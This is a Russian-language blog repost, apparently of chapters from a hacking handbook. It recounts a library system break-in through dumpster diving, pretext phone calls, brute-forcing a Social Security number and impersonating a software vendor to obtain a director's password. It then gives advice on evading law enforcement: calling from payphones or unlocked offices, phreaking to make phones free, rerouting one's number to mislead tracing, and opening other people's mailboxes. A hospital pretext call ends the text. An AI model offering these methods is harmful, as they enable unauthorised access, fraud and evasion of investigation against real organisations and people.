Компьютеры дали возможность каждому получать огромные количества информации быстрее и дешевле, чем когда-либо прежде. Свободное распространение информации является благом, но лишь постольку, поскольку не ущемляет прав человека. Существует два вида прав человека—права отдельной личности и права человечества в целом. Человечество должно иметь возможность виртуального доступа к любой информации, и эта информация должна использоваться в моральных целях.

Люди должны знать то, что они хотят знать, и нельзя скрывать от них информацию. Новые идеи должны публиковаться и обсуждаться. Знания должны доходить до людей. Технологии должны использоваться на благо людей, но не ради наживы и не в политических целях. Каждый человек должен иметь право на то, чтобы связанная с ним информация не использовалась во вред ему. Люди должны иметь право знать, если их личная информация внесена в базу данных, знать о том, кому и когда она отдается или продается. Они должны иметь право следить за тем, каким образом используется эта информация. Человек должен иметь право проверять информацию о самом себе, если она занесена в компьютерный файл или базу данных, и в этом ему не должны чиниться препятствия. Он должен иметь право беспрепятственно исправлять неточности в этих данных, и убирать оскорбительную для себя информацию. Аюди должны иметь гарантию, что те, кто создает и обслуживает базы данных, будут своевременно предоставлять им эти права.

Так должно быть, и в некоторых ситуациях эти права действительно имеют силу. Но большинство этих прав почти единодушно игнорируется. Значит, взломы необходимы.

Хакерство позволяет использовать компьютеры в соответствии с вышеперечисленными идеалами. Хакеры обладают идеалами относительно всех людей и всего человечества в целом, и у меня есть набор таких идеалов, которые лично я использую. Вот главные из них:

Никогда и никаким образом не наноси вред ни компьютеру, ни программному обеспечению, ни системе, ни человеку, ничего не изменяй и не уничтожай.
Если вред все же был нанесен, сделай все, что в твоих силах, чтобы исправить содеянное, и предотвратить подобное в будущем.
Не позволяй ни себе, ни другим откровенно наживаться на взломах.
Сообщай компьютерным менеджерам о наличии прорех в защите их компьютеров.
Учи других, если тебя просят об этом, делись знаниями, если тебе есть чем делиться. Это не необходимость, но простая вежливость.
Помни о своей уязвимости во всем, что касается компьютеров, включая секреты, которые тебе удалось узнать с помощью взломов.
Будь осторожен. Проявляй настойчивость, но не делай глупостей и не рискуй понапрасну.
Я не хочу сказать, что следование этим принципам делает мои занятия хакерством моральными или правомочными. Но я также не считаю, что мое хакерство аморально. И я не стану выслушивать ничьих возражений по этому поводу. Мы-то знаем, что законно, а что — нет. Я собираюсь заниматься хакерством вне зависимости от того, насколько моральным я его считаю. И если у вас возникнет вопрос типа “Неужели вы действительно думаете, что этот ваш кодекс чести может оправдать что-нибудь вроде „вынюхивания"?”, значит, у вас в крови нет хакерства.

Комбинирование принципов

В данной книге я попытался предложить основные указания по различным темам, которые подготовят вас к любой, связанной с компьютерами, ситуации, в которой вы можете оказаться.

Когда речь заходит о понятии “хакерства”, невозможно говорить о какой-то определенной последовательности шагов, которые следует предпринимать для достижения своих целей. Надо, скорее, выбрать основные идеи, дополнять их по мере необходимости, и взламывать до тех пор, пока что-то не выйдет. Зная, что вас ожидает, вы будете знать, как реагировать на очередное изменение, — и ваши хакерские способности только увеличатся. Я хочу рассказать вам еще одну, последнюю, историю. Она демонстрирует многое из того, о чем вы прочли в книге: исследования, копание в мусоре, подглядывание через плечо, упорство и логические рассуждения, программистские методы и методы грубой силы, общие знания о компьютерах, простую и обратную социальную инженерию, анализ экранов и модели систем. Эта история показывает, как все это вместе работает на конечный результат — удачный взлом.

“Команда тигров” в моем лице

Недавно мне представилась возможность показать себя в хакерстве, взламывая только что установленную компьютерную систему специализированной библиотеки. Директор библиотеки был в курсе дела, поскольку они недавно обратились к этой новой системе, которая, в отличие от предыдущих, давала возможность получения коммутируемого доступа с внешних линий. Директор захотел узнать, возможно ли, находясь в режиме поиска, проникнуть в запретные зоны, имеющие дело с штрафами за просроченные книги, именами и адресами клиентов и можно ли вообще выйти из библиотечной программы в ОС? И многое-многое другое. Я сообщил ему, что буду счастлив разобраться с этой проблемой. Он предложил дать мне один из номеров для соединения с системой, но я отказался. Ведь я — хакер! (На самом деле я просто хотел произвести на него впечатление — я уже знал этот номер, когда он демонстрировал мне работу общедоступной части системы.)

Я вызвал систему из дома и изучил ее вдоль и поперек. Это была система, работавшая по командам. На экране я смог выбрать функцию, вводя такие команды, как CAT для поиска библиотечного каталога, и HOL, чтобы помечать пункты. Правильно завершать сеанс работы следовало с помошыо команды END. Я попробовал вводить другие, не указанные, команды. Очень часто бывает так, что часть системы является открытой, а часть — секретной. Почти всегда общедоступная часть располагает по крайней мере одной секретной командой для входа в закрытую часть. Итак, я использовал множество ключевых слов: EXIT, BYE, LATER и т. д. Я видел, что некоторые из них используются в действующих прикладных программах. Так, команда LEAVE открывала доступ в специальную область для кураторов и сотрудников музея. Но ни одна из испробованных мною команд не сработала. Так как система была новой и не устоявшейся, я не сомневался, что в ней должна быть куча ошибок, которые я смогу обнаружить. В разговоре с директором он упомянул о том, что определенные функциональные клавиши на терминалах еще не установлены, и их нажатие означает провал в непонятную программную оболочку. Ага! Вот это-то мне и надо! Но, если вы вызываете систему по телефонной линии, вы не сможете добраться до функциональных клавиш. Я думал, что, возможно, функциональные клавиши являлись макросами команд, которые пользователь так или иначе должен вводить вручную, но я не знал этих команд.

Под покровом ночи я извлекал содержимое находящихся возле здания мусорных контейнеров в поисках полезной информации, и наконец нашел кое-что — ужасно изорванную брошюрку — документацию по интересующей меня системе. Дома я увидел, что среди перечисленных в карточке вешей были и имена команд, присвоенных функциональным клавишам. Одну-две из них можно было прочесть, остальные же прочесть не удалось. Но и двух было достаточно. Мне сразу стало ясно, что я исходил из неверных предпосылок — не ВСЕ команды представляли собой стандартные слова английского языка или аббревиатуры. Присутствовали и двузначные команды, и точечные. Вводя точечную команду, вы набираете сперва точку, а вслед за ней — буквенно-иифровую команду. Они часто используются в прикладных программах, когда непосредственный ввод буквенно-цифровой команды может быть истолкован как ввод данных. В программах часто используется точка перед командами, поскольку точка — простой, неприметный символ, который очень просто набрать. Но иногда в “точечных” командах используются и другие символы — слеш, апостроф и т. п. Из карточки я узнал, нажатие клавиши F1 соответствует команде .QUIT, a F2 — команде .HELP. Это показалось многообещающим — .QUIT могла давать доступ к закрытым областям, а помощи, скорее всего, вообще пока нет, так как система только что установлена. Возможно, эта функция и ведет к остановке системы. Я вызывал компьютер по внешней линии, а через модем нажатие функциональных клавиш передать невозможно; так что мне оставалось надеяться на .QUIT и .HELP. Конечно, я уже пытался их вводить, но без точки. Может быть, теперь... Нет! Ничего! Команда .QUIT просто отсоединила меня от компьютера. В ответ на .HELP экран очистился, и на нем появилось следующее:

*EOF\txt\hlp\helpOOO* Я предположил, что это означало End Of File helpOOO в директории \txt\hlp, то есть файл существовал, но был пустым. Я тут же обрадовался — теперь я знаю о директориях текстовых файлов и файлов помощи. И я заметил еще кое-что:

каждый раз при смене экрана вверху появлялось нечто вроде:

*** J. Smith Co Special Library On-Line ***

(000)U,SYSv55.6 Три цифры в скобках изменялись в соответствии с тем, какую часть программы я использовал. Три нуля, возможно, означали открытый экран, где я пытался набирать не указанные в списке команды. Если я наберу команду .HELP вместе с номером экрана, допустим, (013), значит, решил я, система начнет искать файл “\txt\hlp\help013”. Так и случилось. Для ввода эта система использовала, в том числе, и команды, сопровождающиеся номером. Мне стало интересно, подходит ли такой формат и для команд помощи. Я попробовал ввести “HELP99999”, надеясь, что такое большое число система просто не проглотит — ведь, такого экрана просто не может быть. В ответ я получил сообщение о неверной команде. Я попробовал другие варианты, но они тоже не сработали. Наконец, я снова набрал “HELP99999”, и на этот раз команда подействовала! Наверно, в первый раз я сделал ошибку. Теперь система полетела, и я оказался в отладочной среде программы. Это было нечто вроде мини-системы для редактирования текстовых и командных файлов. Я не нашел в ней ничего ценного, кроме копирайта с первыми буквами названия компании, выпустившей программу. Я просмотрел несколько каталогов компаний по производству программного обеспечения, пытаясь расшифровать аббревиатуру, и наконец мне это удалось. Позвонив туда, я выяснил, что именно они написали интересующую меня программу. Я попросил прислать мне запасную документацию к пакету. Конечно, сказали они, просто вышлите нам серийный номер своей программы, и они вышлют мне книгу за соответствующую плату. Я попытался схитрить, но не тут-то было: секретарша сообщила, что серийный номер можно найти на ярлыке инсталляционных дискет. “У меня сейчас нет дискет... Я звоню из машины. Я уверен, что высылал свою карточку, может, вы проверите? Меня зовут Ажонатан Смит из ...” Я молил бога, чтобы настоящий J. Smith посылал им свою карточку. Но — нет. Мне пришлось сказать, что я перезвоню на следующий день. Я решил, что в библиотеке компании должна быть эта документация, но не мог же я там появиться и попросить директора дать мне ее на время. Я должен был действовать как независимый хакер. Пришло время серьезно заняться социальной инженерией. Директор для этой цели не годится — он знает мой голос. Все, что мне было надо, — это серийный номер. Я позвонил секретарше библиотеки и сказал, что я — программист из компании, которая установила им новую компьютерную систему, и хотел бы знать, нет ли у них восьмой версии программы? Этого она, конечно, не знала, но я вежливо объяснил, что ей нужно просто найти несколько дискет с приклеенными на них ярлычками... Найдя их в директорском офисе, она сообщила мне серийный номер. Одной из его цифр оказалась восьмерка, и я сказал ей, что все верно, и я просто хотел убедиться, что компания поставила им самую новую версию, и как только появится девятая версия, мы пошлем ее им.

Я больше суток разбирался в отладочной документации. Я обнаружил, как можно обойти программное окружение и как — самое главное! — выйти из него. Выйдя из отладки, я оказался перед приглашением к загрузке. Нажав в ответ “circ” и “JSC” — J. Smith Co. — я вошел внутрь. Разумеется, здесь я привожу вымышленное имя. После ввода верного пароля я оказался на втором уровне зашиты — circ,JSC была общая входная комбинация, известная любому легальному пользователю. Я знал, что означает “ваш личный девятизначный код”. Номер социальной безопасности! Я знал, где родился и вырос директор, так что первые три цифры у меня были. Я написал программу для перебора последних шести цифр, и вскоре нашел верную комбинацию. Мне выдали сообщение: “Добрый вечер, Ажейн Торнбакл! Пожалуйста, введите ваш личный пароль”. Директора звали иначе. Теперь мне был нужен пароль Ажейн. Я снова попробовал метод грубой силы, но безрезультатно. Я не знал, кто такая Ажейн Торнбакл, но у меня была извлеченная из мусора пачка рекламных проспектов компании. А вот и ответ: Торнбакл оказалась сотрудницей отдела службы управления информацией — то есть программистом. Вычислить ее пароль мне так и не удалось; продолжив перебирать номера социальной безопасности, я опять вышел на номер директора библиотеки. Итак, чего я достиг? Программная оболочка — вещь интересная, и я научился с ее помощью как угодно редактировать файлы и т. п. Я сумел использовать одну из отладочных команд поиска для обнаружения слова “circ” в файлах системы. В одном из них среди абракадабры я обнаружил слово “minicirc”, а затем “circ”. Я попытался расшифровать абракадабру, идущую после “circ”, думая, что это зашифрованное “JSC”, и надеясь таким образом найти ключ к абракадабре после “minicirc”. Безрезультатно. Вернувшись к входному приглашению, я попытался использовать “minicirc” с различными паролями. Проблема была в том, что я не знал, что такое “mini”. Я подумал, что это может быть модель программы или руководство. Наконец, я нашел верный пароль — T.CIRC1. Он-то и привел меня к заветному сообщению: “Пожалуйста, введите вам личный девятизначный идентификационный код”. Через несколько секунд я нашел нужный номер, и экран очистился. “Доброе утро, Новый Пользователь!” — появились на нем слова. — “Пожалуйста, введите ваш личный пароль”. Я надеялся, что это — последний уровень зашиты. И точно: через несколько мгновений мне удалось войти, использовав пароль “TRAIN”. Я гордился собой — я взломал-таки закрытую часть системы. Но приключения еще не закончились — ведь “minicirc” была всего лишь учебной моделью настоящей системы. Ее можно было использовать для проверки книг для выдачи посетителям, регистрации новых посетителей, поиска в базах данных и т. д. Но в базе данных содержались только вымышленные имена и адреса. Многие другие свойства системы были бесполезны, но мне помогло само их наличие.

Там была электронная лоска объявлений, на которой инсталлировавшие программу оставили несколько стандартных сообшений-приветствий. Прочитав их, я узнал немало полезного. Каждое сообщение открывалось списком пославших его, и тех, кому оно предназначалось. Я заключил, что можно посылать сообщения из “minicirc” в “circ”, и наоборот. Во-вторых, там оказались сообщения, предназначавшиеся одному пользователю, но по ошибке посланные всем. С помошью текстового редактора я написал письмо и лично послал его. Затем вышел, перезвонил и снова оказался в программной оболочке. Использовав редакторы отладчика, я нашел написанное мною письмо, и изменил его содержание, адресовав его директору библиотеки. Свое имя, под которым хранился файл, — “Новый Пользователь” — я изменил на фиктивное имя представителя компании, произведшей программное обеспечение. В послании содержалась просьба к директору позвонить этому представителю для разговора насчет новой, девятой, версии — обратная инженерия! Телефонный номер, который я дал директору, принадлежал одному моему другу, которому я кратко объяснил, как действовать в случае, если директор позвонит. На всякий случай мы установили автоответчик. Когда директор позвонил, мой друг немного рассказал о новых разработках, а затем задал несколько технических вопросов о способе, с помошью которого в библиотеке была инсталлирована программа. Директор не знал этого, но сказал, что может посмотреть у себя на терминале, загрузившись в систему... “Отлично”, — сказал мой друг. — “Делайте все то же, что обычно. Circ. JSC. Так, номер... Кстати, вы используете все тот же личный пароль?” “Ну да, „Firebird". Ну вот, я загрузился...” Итак, последний шаг оказался самым легким.

Для завершения проекта мы стали думать, что же можно сделать, используя директорский системный доступ. Оказалось, что сделать можно многое. Покинув данный уровень, мы вышли на сетевой сервер, а оттуда загрузились в один из главных компьютеров, используя имя и пароль директора. Под конец, для подтверждения своего успеха, я использовал редактор интерактивного отладчика и изменил программу так, чтобы вместо пояснений к командам она выдавала на экран непристойную шутку. Затем я оставил файл в директории директора библиотеки, в котором объяснил, каким образом был совершен взлом.

Комбинирование принципов

Если вы хотите быть по-настояшему удачливым хакером, вы должны стать “хакером на все руки”. Недостаточно хорошо владеть методами социальной инженерии, или быть гением-программистом, и т. д. Вы должны обладать всеми этими навыками в совокупности с богатым воображением и установкой на конкретные цели. Плюс этика. Я действительно считаю, что хакерство без этики не ведет ни к чему хорошему — если вы будете причинять неприятности другим, то неприятности вскоре начнутся и у вас. Присутствовала ли этика в описанном мною взломе? Конечно — ведь я просто переименовал экранный файл, а неприличную шутку поместил в другой, под прежним именем. Позднее мы вместе с директором и программистами компании вместе обсудили план действий по заделыванию дыр в защите системы.

Мысли в заключение

Спросите мудреца о цели существования вселенной, или еще что-нибудь в том же духе — и он ответит:

— Этого нельзя выразить словами. Я знаю ответ, я его чувствую, но неописуемое словами не опишешь. “Ну и чушь!” — подумаете вы. Конечно. Но вместе с тем это правда. Мудрец действительно верит в то, что знает обо всех тайнах вселенной, но вы этого не поймете, пока сами не почувствуете то же самое. Вот ваш проводник в мире хакерства, лежащем за пределами этой книги. Из книги вы узнали идеи, методы и факты, которые позволят вам начать заниматься хакерст-вом, сводя к минимуму возможность совершения ошибок. Но это еще не все. Это хобби (игра? профессия?) требует, как и любое хобби, времени, сил, практики и еще, и еще, до тех пор, пока у вас все не начнет получаться так, как вы хотите.

Несколько советов обеспокоенным администраторам

Если же вы прочли эту книгу с точки зрения соблюдения закона и обеспечения компьютерной безопасности — что ж, теперь вы знаете множество способов взлома самых “непробиваемых” систем. Вы, наверное, уже составили список мер, которые примете против описанных мною методов. Объясните вашим пользователям, что никогда нельзя открывать никакую конфиденциальную информацию по телефону, по почте или в режиме онлайн. В ответ на просьбу открыть пароль следует отвечать просто: “в этом я не смогу вам помочь”. Нельзя раскрывать имена или телефонные номера, адреса электронной почты иди физические адреса. Если человек спрашивает такие веши, он, скорее всего, является хакером.

Установите правила, по которым легальные пользователи задавали бы вопросы любому подозрительному типу, шатающемуся по офисам. Но не стоит и слишком давить на пользователей проблемами безопасности. Если вы проявите излишнюю бдительность — например, поменяете все пароли, — пользователи могут вас не понять. Объясните им, что они потеряют, если компьютерная безопасность будет нарушена. Убедите их, что это важно для всех сотрудников организации. Чтобы убедиться в нерушимости зашиты на все 100%, возьмите за правило регулярную проверку и очистку компьютеров. Найдите и залатайте дыры в защите вашей системы. Уберите все отладочные опции, которые могут быть причиной появления таких дыр. Если вы увольняете сотрудника, немедленно сотрите его доступ и поменяйте код всех остальных. Существует специальная литература о мерах по компьютерной безопасности, которые должен предпринять администратор. Прочтите ее. Немного хорошей работы — и ваш труд не пропадет зря.

Несколько советов обеспокоенным хакерам

Вы прочли всю книгу, и все еще сомневаетесь в успехе? Я гарантирую вам — если вы прилежно обучаетесь хакерству, вы станете настоящим мастером этого искусства. Лаже если вам пока не удалось совершить ни единого взлома, вы все же можете считать себя настоящим хакером — ведь у вас благородные намерения, вы соблюдаете правила хакерской безопасности, вы не станете вредить системе, которую взломаете, и вы стремитесь наслаждаться жизнью во всей ее полноте. А все это и есть хакерство. Поздравляю вас и желаю удачи: теперь вы знаете все Секреты Супер-Хакера! То есть ваши секреты.
Рубрики:  Брутерсто

Kак не попасть в лапы 3акона?

Четверг, 21 Февраля 2008 г. 11:59 + в цитатник
Kак не попасть в лапы закона
Хакерство — это здорово. Черт возьми, да это просто потрясающе! Но вместе с тем хакерство — нелегальное, порой аморальное и обычно наказуемое занятие. Даже если вы не сделали ничего плохого, для судей вам придется подыскать достаточно веское обоснование своим действиям. Самое малое, что может произойти, это заделка прорех в компьютерной безопасности, которые вы использовали для взлома. Более серьезные наказания могут варьироваться от штрафов и вплоть до тюрьмы. Неофициальные наказания могут заключаться в разрушении вашего оборудования и невозможности устроиться на работу, имеющую отношение к технике. Занимаясь своим делом, предусмотрительный хакер преследует две цели:

Не попасться.
Если попался, постараться не усугублять дела.
В этой главе рассказывается о стратегиях, с подошью которых можно следовать этим правилам. Хакерство предполагает не только технические знания, но и особый склад ума. И часть этого ума должна быть отдана знаниям о том, как обеспечить собственную безопасность, иначе оставшаяся часть будет тратиться зря. Приведенные здесь стратегии следует не только знать и применять, но и уметь приспосабливать их к новым ситуациям. Не забывайте, сколько компьютерных преступников отправились в тюрьму. Правда, некоторые из них умудрялись заниматься хакерством и там. Некоторые даже научились хакерству в тюрьме. Но если вы все же не стремитесь туда попасть, везде и повсюду помните приведенные ниже советы.

В процессе исследований

На вашей территории проживания могут действовать местные законы, запрещающие машинам или людям постоянно набирать номера и отключаться сразу после набора (так поступает, например, программа автонабора, когда ищет входные наборы). Если вы делаете звонки самостоятельно, лучше говорить тому, кто поднимет трубку: “Извините, я ошибся номером”, нежели просто бросать трубку. Помните правило: чем больше людей вы разозлите, тем больше вероятность, что вас начнут преследовать и, в конце концов, накажут.

При ЗАНЯТИЯХ СОЦИАЛЬНОЙ инженерией

Социальная инженерия, а еще чаше обратная социальная инженерия, предполагает контакт с зарегистрированным пользователем по телефону или посредством электронной почты. Это рискованно, так как при этом вы даете свой адрес или телефонный номер людям, которых собираетесь обмануть. Для решения данной проблемы хакеры разработали несколько оригинальных методов.

Однажды я вышел на небольшое предприятие, которое закрывалось на несколько недель. Проведя некоторые исследования и свершив несколько взломов, мне удалось найти программу, которая оставляла сообщения на их автоответчике. С ее помощью я смог входить в контакт с людьми, не сообщая им, кто я такой. Я поместил телефонную рекламу компьютерной сети, приглашавшую людей звонить и оставлять свои имена и данные. Я мог в любое время вызвать компьютер, набрать заветный код и прослушать эти сообщения. Когда предприятие вновь открылось, я позвонил им, сказав, что я из телефонной компании, и сообщил владельцу, что несколько линий пересеклись, из-за чего к ним иногда могут проходить непонятные звонки.

Некоторые хакеры просто переводят телефонные автоматы в резидентное состояние и работают с них. Для занятий социальной инженерией по почте можно арендовать личный почтовый яшик. Один хакер нашел более простое решение. Он заметил, что почтовый яшик в колледже, находящийся прямо под его ящиком, всегда пустует и, по-видимому, никому не принадлежит. Он долгое время пользовался им, с помощью нехитрого приспособления опуская туда свою секретную корреспонденцию (позднее я показал ему, как открывать эти ящики).

Использование: телефона

Если хотите сохранить что-то в секрете, не говорите об этом по телефону.

Нельсон Рокфеллер

Если вы новичок, у вас может не возникнуть никаких затруднений с вызовом удаленных компьютеров из собственного дома. Но однажды вы можете оказаться в ситуации, когда не будете точно знать, не прослушивают ли ваш телефон и не следят ли за тем, как вы используете компьютер. Значит, если вы уже вышли из хакерского “детства”, вам не следует делать незаконных вызовов из своего дома и вообще с любого телефона, по которому вас могут выследить.

Неприятности могут произойти, даже если вы действительно новичок. Представьте себе, что вы стали членом TECHRIME-USA BBS как раз тогда, когда ФБР собирается начать акцию против системных операторов, использующих свои доски объявлений в нелегальных целях! Вам совсем не захочется быть втянутым в это, особенно, если вы не делали ничего противозаконного. Даже намек на полуправдивые слухи, циркулирующие по каналам технического андеграунда, может заставить телефонные компании начать следить за проходящими по их линиям модемными сообщениями и записывать их. Это может проделываться автоматически с помощью детекторов, которые прослушивают тоны модемов и передают их на записывающее устройство. В любом случае надо учитывать следующее: 1. Технология, позволяющая делать такие веши, существует, и 2. Известно, что прослушиваются очень многие телефоны. Итак, если вам необходимо общаться с известными компьютерными преступниками, или с доказанными хакерами, соблюдайте крайнюю осторожность.

Делать телефонные вызовы можно не из дома, но откуда-либо еще. Возможно, придется раскошелиться на портативный лап топ. Сделав это, купите к нему также акустический соединитель и внешний модем. Все это обойдется вам в одну-две тысячи долларов — гораздо меньше, чем потребует с вас адвокат, если вы попадетесь. Акустический соединитель необходим, так как не везде имеются телефонные розетки. Во внешний модем вы будете вставлять соединитель. Многие лап топы уже снабжены модемами, но это внутренние модемы, которые нельзя подсоединить к телефону.

Итак, вы обзавелись оборудованием. Куда бы его ^ поместить? Существует много возможностей. Ночью и на уик-энд бывает можно проникнуть в здание какого-нибудь большого офиса и, если дверь не заперта, устроиться в одной из смежных комнат. Два года назад летом, прогуливаясь в центре своего города около девяти вечера, я заметил, что окна всех учреждений открыты — и это вечером! Днем стояла жара, и, вероятно, их таким образом проветривали. Будь я в соответствующем настроении, я мог бы беспрепятственно проникнуть в любое здание и подключить свой портативный компьютер к телефону, находясь всего в нескольких сотнях метров от полицейского участка.

Если у вас водятся деньги, или вам удалось взломать какой-нибудь счет, вы можете заниматься хакерством в гостинице или мотеле. Денежные проблемы беспокоят хакеров и по другой причине. Телефонные счета растут, как на дрожжах, поэтому многие хакеры являются также и фриками. Фрик — это человек, занимающийся взломами телефонных сетей. Одним из основных аспектов этого занятия является создание тональных кодов, которые заставляют телефонную систему выполнять специальные функции, такие, как бесплатные звонки на дальние расстояния. Фрикерство, разумеется, представляет собой обширную область для хакерских исследований, и с телефонными системами — а особенно с компьютерами, обслуживающими эти системы, — должен быть близко знаком каждый хакер. Многие хакеры считают, что любое другое хакерство, нежели взлом таких компьютеров, — это детские игры. В чем-то они правы.

Телефонные компьютерные сети — это невероятно большие, распространенные, замечательные массивы хитроумных функций, громадных баз данных, технических операций и прочих чудес, на фоне которых бледнеет все прочее хакерство. Покинув ваш дом, телефонный сигнал отправляется на местную АТС, которая управляет всеми телефонами вашего района. Каждая АТС управляется собственным компьютером. Такие компьютеры и являются потенциальными целями взломщиков телефонных компаний; если вы получите доступ к компьютеру, у вас будет доступ ко всем телефонам, которыми он управляет. Вы сможете включать и выключать телефоны, перенаправлять вызовы, изменять номера. Не будь вы хакером, вы могли бы устроить таким образом немалый переполох.

Существуют также коммутируемые сети, которые соединяют между собой компьютеры, управляющие коммутаторами. Из них можно проникнуть в региональные системы типа COSMOS (одной из функций которой является создание и уничтожение телефонных номеров). Когда вы поближе познакомитесь с особенностями этих телефонных компьютеров, вы можете использовать их для собственной зашиты. Например, вы не хотите делать хакерские телефонные звонки из собственного дома. Вы можете соединиться с компьютером вашей местной АТС, взять телефонные номера нескольких автоматов и сделать их бесплатными. Затем вы можете взламывать из этих автоматов хоть целый мир.

Вы можете также использовать региональную обслуживающую систему, чтобы временно изменить ваш настоящий номер телефона на номер, допустим, близлежащей церкви. Если ваши звонки и отследят, слежка отправится по ложному пути. Должен заметить, что вызов удаленных компьютеров — не такая безопасная вещь, как может показаться. Иногда соединение с помощью телефона или компьютера дает ложное чувство защищенности, особенно, если вы уже достигли успехов в хакерстве и фрикерстве и утратили чувство бдительности. Не допускайте подобного. Всегда следуйте правилам безопасности. Не приобретайте никаких привычек. Делайте звонки всегда из разных мест и в разное время дня. Когда лучше всего делать вызовы? Каждый хакер ответит на этот вопрос по-разному. Поздний вечер хорош тем, что системные администраторы, скорее всего, уже дома — но то же самое можно сказать и про большинство полноправных пользователей, и вы со своим звонком будете выделяться, как клоун на похоронах. Можно попытаться также звонить в самый разгар рабочего времени, в середине утра и после обеда, но в это время мэйнфрэймы работают медленнее всего, вашу деятельность нетрудно будет заметить, да и бюджет, который вы взломали, может быть занят. Наилучшего времени для вызовов не существует — вам могут помочь разве что исследования организации устройства компьютерной зашиты конкретного предприятия. Замечайте время, в течение которого вы были соединены с машиной по телефону. Если это местный звонок, сигнал идет мгновенно, и чуть дольше — если вы звоните издалека. Но не стоит висеть по полдня на одной и той же линии. Лучше сделать несколько вызовов с разных телефонных номеров на разные номера доступа. Если на избранном вами объекте имеется несколько коммутируемых линий, следует время от времени бессистемно пользоваться каждой из них.

Советы по лап топам

Если вы делаете вызов бог знает откуда со своего портативного лапопа, я могу предложить вам несколько полезных советов. Если вы находитесь в незнакомом месте, например, в офисе, отеле, аудитории после уроков и т. п., ваш лап топ является неоспоримой ценностью — до тех пор, пока он работает. Никогда не подключайте ваш модем к незнакомому телефону. Сначала убедитесь, что не сожжете таким образом ваше оборудование. Многие конторы устанавливают свои собственные электронные телефонные системы, или РВХ (private branch exchange) — частные телефонные станции, для выполнения специальных функций, таких как переговоры внутри здания, либо чтобы не дать определенным телефонам делать телефонные звонки на дальние расстояния. По проводам некоторых РВХ течет ток, достаточный, чтобы повредить ваш хрупкий модем. Чтобы проверить безопасность линии, сначала попробуйте подсоединить к ней обычный дешевый телефон. Если он заработает, то и модем тоже будет работать. Телефоны, объединенные в РВХ, могут не работать с вашим модемом из-за специальных звуковых или цифровых кодов, используемых в локальных процедурах маршрутизации. Если на вашем проверочном телефоне имеется сигнал в линии, но модем не работает, значит, данная РВХ неисправна. Для устранения этой проблемы вы можете включить модем в телефонную розетку, а комнатный телефон (не тот, что взяли для проверки!) — к модему (для этого вам может понадобиться специальный двойной порт). Чтобы использовать модем, вы делаете звонок с комнатного телефона, а затем, услышав звонок удаленного компьютера, включите модем и подсоединяйтесь.

Вы можете приобрести устройства для обработки сигналов, проходящих между телефоном и модемом. Такое устройство приспосабливает обычные сигналы модема к цифровым системам вроде РВХ. Для вас это будет более приемлемым, особенно если вам часто приходится сталкиваться с РВХ. Иногда попадаются такие места, где есть телефон, но нет розетки для вашего модема. В этом случае надо отвинтить рупор микрофона телефона и с помощью кабеля с присоединенными “крокодильчиками” соединить красные и зеленые провода вашего модема с двумя серебристыми контактами микрофона телефонной трубки. Это может повлечь за собой возникновение слабого сигнала, поэтому, если в вашем распоряжении есть настоящий телефонный аппарат (а не одна трубка), снимите с него корпус и соедините красные, зеленые провода модема с красными, зелеными проводами телефонного преобразователя. Чтобы позвонить, вам придется придерживать рычаг телефона.

Ваше походное снаряжение

Прежде чем выхолить на большую дорогу, не забудьте прихватить с собой следующие предметы: лап топ, иди другой портативный компьютер. Обязательно модем. Лучше два: внутренний и внешний, с чашечками акустического соединителя. Один небольшой, дешевый, надежный телефонный аппарат для проверки напряжения на линии. Можно использовать готовый тестер, но телефон удобнее использовать, например, в мотелях, где акустический соединитель может не подойти к местному телефону. Телефонный шнур с модульным зажимом на одном конце и зажимами- "крокодилами” на другом. Ножницы для обрезки проводов, отвертки и набор шнуров с портами разного размера.

ХОДЬБА на ЦЫПОЧКАХ

Большинство менеджеров смотрят даже на самых честных, избегающих разрушений хакеров как на дьявольское отродье. Поэтому, если вас застали за взломом чужих компьютеров, ждите неприятностей. Даже если ваш взлом не принес никому вреда, вас все равно, скорее всего, накажут. Я читал статьи о том, что компьютерные преступления ежегодно уносят, по крайней мере, от 3 до 5 биллионов долларов. Другие же источники приводят данные до ста биллионов. Лично мне даже три биллиона кажутся несколько завышенной, для пущей убедительности, суммой. Но правительство и владельцы предприятий считают иначе. Они понимают, что большинство компьютерных преступлений остаются нераскрытыми, и реальные убытки могут оказаться гораздо больше официальной суммы. Даже если все эти биллионы долларов — не более, чем выдумки, государство и промышленники в них верят, и полны решимости наказывать всякого, кто отнимает у них такие деньги.

Давайте теперь рассмотрим случай, произошедший с BBS Гринвудской “Pretty Theft” ( “Вороватая милашка”)—так звали одну женшину-хакера, с которой я время от времени обшался. Однажды она послала мне на BBS сообщение, в котором спрашивала, не знаю ли я, как проникнуть в компьютеры одного госпиталя неподалеку от меня. Я был в недоумении — задача была проше простого, и взлом данной системы можно назвать одним из моих первых успехов. При загрузке в эту систему появлялось следующее сообщение (все имена и номера, разумеется, изменены):

Добро пожаловать в GFH-NET! 300-2400 бод (123)45&-7890 GREENWOOD FAMILY HOSPITAL GFH-NET обслуживается Роджером Корнуоллом и Гарольдом Липником. Если у вас возникнут вопросы или комментарии, напишите им по электронной почте!!! Ваше имя? Введите имя и фамилию:

Ваш пароль? Если у вас нет пароля, нажмите “RETURN” после ввода:

Через несколько месяцев после того, как я активно занялся хакерством, я сидел за компьютером и одновременно смотрел выпуск вечерних новостей. В новостях я увидел репортаж об одном из членов правительства, который сломал руку и был вертолетом отправлен в больницу. Тогда я подумал: “Эге, ведь в больницах наверняка есть компьютеры, верно? Так почему бы мне не взломать такой компьютер!” Итак, я раздобыл якобы закрытый номер доступа в сеть Гринвудской семейной больницы, и в ответ на вызов получил такой вот гостеприимный экран. Догадываетесь, что я сделал вслед за этим? Нетрудно догадаться — я, конечно же, ввел в качестве имени имя Роджера Корнуолла. К сожалению, у настоящего Роджера Корнуолла имелся какой-то пароль; а нажав “RETURN”, я просто получил сообщение об ошибке. Тогда я попробовал имя Гарольд Липник. Тот же результат. Я достал телефонную книгу, нашел телефонный номер Гринвудской семейной больницы и позвонил. Женский голос сказал: — Гринвуд. Чем я могу вам помочь? — Извините, — сказал я, — нельзя ли пригласить Тома? — Кого? — М-м... Есть у вас один парень, я с ним уже говорил... Супервизор, или что-то в этом роде... — Вы имеете в виду Аи Брауна? — спросила она. — Ну да, вот именно. (Не знаю, почему я решил, что его зовут Том.) А он на месте? — Нет. Ли ушел в пять. — Понятно, спасибо. — Пока.

